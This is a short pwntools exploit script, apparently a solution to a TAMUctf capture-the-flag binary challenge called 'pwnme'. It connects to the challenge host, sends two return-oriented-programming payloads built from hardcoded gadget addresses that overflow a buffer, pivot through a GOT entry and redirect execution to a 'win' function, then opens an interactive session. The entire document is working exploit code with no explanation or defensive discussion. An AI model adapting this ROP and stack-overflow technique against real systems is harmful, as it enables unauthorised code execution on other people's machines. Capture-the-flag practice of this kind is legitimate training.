ʕ·ᴥ·ʔ

from pwn import *

libp = ELF("./libpwnme.so")
file = ELF("./pwnme")

p = remote("tamuctf.com", 443, ssl=True, sni="pwnme")

pop_rdi = 0x40118b
pop_rsi_r15 = 0x401189
sub_rax_rsi = 0x4011b2
ldr_rax_rdi = 0x401191
call_rax = 0x401010
jmp_rax = 0x40109c
ret = 0x401016
pop4 = 0x401184

attack =  p64(0) * 3
attack += p64(file.symbols["main"])
attack += p64(0)
attack += p64(ldr_rax_rdi)
attack += p64(sub_rax_rsi)
attack += p64(jmp_rax)

assert(len(attack) <= 0x48)

p.send(attack.ljust(0x48, b"\x00"))

attack = p64(0) * 3
attack += p64(pop_rsi_r15) + p64(libp.symbols["pwnme"] - libp.symbols["win"]) + p64(0)
attack += p64(pop_rdi) + p64(file.got["pwnme"])
attack += p64(ret)

p.send(attack.ljust(0x48, b"\x00"))

p.interactive()